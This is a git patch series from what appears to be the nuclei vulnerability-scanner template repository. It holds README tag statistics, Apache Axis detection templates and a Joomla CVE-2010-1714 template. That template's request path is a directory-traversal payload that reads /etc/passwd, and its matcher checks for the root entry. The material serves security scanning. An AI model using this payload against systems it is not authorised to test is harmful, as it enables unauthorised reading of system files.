+| tpshop | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | | wooyun | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | | extractor | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| ilo | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | | dvr | 1 | | | | | | | | | | plugin | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | | jnoj | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | | cyberoam | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| camera | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | | netgenie | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | | idemia | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| prestashop | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index affcdde18b..9516a71bfa 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | -| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | -| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | -| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | -| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | -| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | +| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | +| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | +| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | +| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | | cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | | +| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | +| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | From e4f918b7472f2d6edf833e62a83c6168e20a5aca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 25 Aug 2021 23:11:49 +0000 Subject: [PATCH 1877/4083] Auto Update README [Wed Aug 25 23:11:49 UTC 2021] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index fba79152e9..ee37e1923f 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | -| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | -| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | -| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | -| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | -| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | +| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | +| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | +| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | +| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | | cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | | +| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | +| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | -**146 directories, 1940 files**. +**146 directories, 1962 files**. From 37695801355bb9c5b888509812e9698d783c725f Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 04:48:40 +0530 Subject: [PATCH 1878/4083] misc update --- dns/can-i-take-over-dns.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/can-i-take-over-dns.yaml b/dns/can-i-take-over-dns.yaml index 0c2c3d7052..fb4f8b6520 100644 --- a/dns/can-i-take-over-dns.yaml +++ b/dns/can-i-take-over-dns.yaml @@ -1,4 +1,4 @@ -id: can-i-take-over-dns +id: can-i-take-over-dns-fingerprint info: name: Can I Take Over DNS - Fingerprint From 1685ce08b024b6e575afee33ffbd6c6b69b20211 Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Thu, 26 Aug 2021 02:11:02 +0000 Subject: [PATCH 1879/4083] Apache Axis 1 and 2 templates --- .../files/axis-happyaxis-disclosure.yaml | 27 +++++++++++++++++ technologies/apache-axis-detect.yaml | 29 +++++++++++++++++++ 2 files changed, 56 insertions(+) create mode 100644 exposures/files/axis-happyaxis-disclosure.yaml create mode 100644 technologies/apache-axis-detect.yaml diff --git a/exposures/files/axis-happyaxis-disclosure.yaml b/exposures/files/axis-happyaxis-disclosure.yaml new file mode 100644 index 0000000000..583eac2cef --- /dev/null +++ b/exposures/files/axis-happyaxis-disclosure.yaml @@ -0,0 +1,27 @@ +id: axis-happyaxis-disclosure + +info: + name: axis-happyaxis-disclosure + author: dogasantos + severity: info + tags: axis,axis2,middleware + +requests: + - method: GET + path: + - "{{BaseURL}}/axis2/axis2-web/HappyAxis.jsp" + - "{{BaseURL}}/axis/happyaxis.jsp" + - "{{BaseURL}}/axis2-web/HappyAxis.jsp" + - "{{BaseURL}}/happyaxis.jsp" + matchers-condition: and + matchers: + - type: word + words: + - "Axis Happiness Page" + - "Axis2 Happiness Page" + - "java.vendor" + - "Examining Application Server" + condition: or + - type: status + status: + - 200 diff --git a/technologies/apache-axis-detect.yaml b/technologies/apache-axis-detect.yaml new file mode 100644 index 0000000000..03a5506ec6 --- /dev/null +++ b/technologies/apache-axis-detect.yaml @@ -0,0 +1,29 @@ +id: apache-axis-detect + +info: + name: apache-axis-detect + author: dogasantos + severity: info + description: Axis and Axis2 detection + tags: axis2,middleware + +requests: + - method: GET + path: + - "{{BaseURL}}/axis2/" + - "{{BaseURL}}/axis/" + - "{{BaseURL}}/" + matchers-condition: and + matchers: + - type: word + words: + - "Validate" + - "Welcome" + - "Axis" + - "deployed" + - "installation" + - "Admin" + condition: and + - type: status + status: + - 200 From 4ceb2425213b03c6ed7a579d2b7915614df92570 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 26 Aug 2021 09:16:18 +0700 Subject: [PATCH 1880/4083] Create CVE-2010-1714.yaml --- cves/2010/CVE-2010-1714.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1714.yaml diff --git a/cves/2010/CVE-2010-1714.yaml b/cves/2010/CVE-2010-1714.yaml new file mode 100644 index 0000000000..3f76bf4834 --- /dev/null +++ b/cves/2010/CVE-2010-1714.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1714 + +info: + name: Joomla! Component Arcade Games 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12168 + - https://www.cvedetails.com/cve/CVE-2010-1714 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 8350741617fab8e80591a945ae9cf222b8922675 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 26 Aug 2021 09:16:44 +0700 Subject: [PATCH 1881/4083] Update CVE-2010-1714.yaml --- cves/2010/CVE-2010-1714.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-1714.yaml b/cves/2010/CVE-2010-1714.yaml index 3f76bf4834..6ff7a55726 100644 --- a/cves/2010/CVE-2010-1714.yaml +++ b/cves/2010/CVE-2010-1714.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12168 - https://www.cvedetails.com/cve/CVE-2010-1714 tags: cve,cve2010,joomla,lfi From 99b5058f202f21257736aa837094e6d5a43500fc Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 26 Aug 2021 09:21:15 +0700 Subject: [PATCH 1882/4083] Create CVE-2010-1601.yaml --- cves/2010/CVE-2010-1601.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1601.yaml diff --git a/cves/2010/CVE-2010-1601.yaml b/cves/2010/CVE-2010-1601.yaml new file mode 100644 index 0000000000..40716c0829 --- 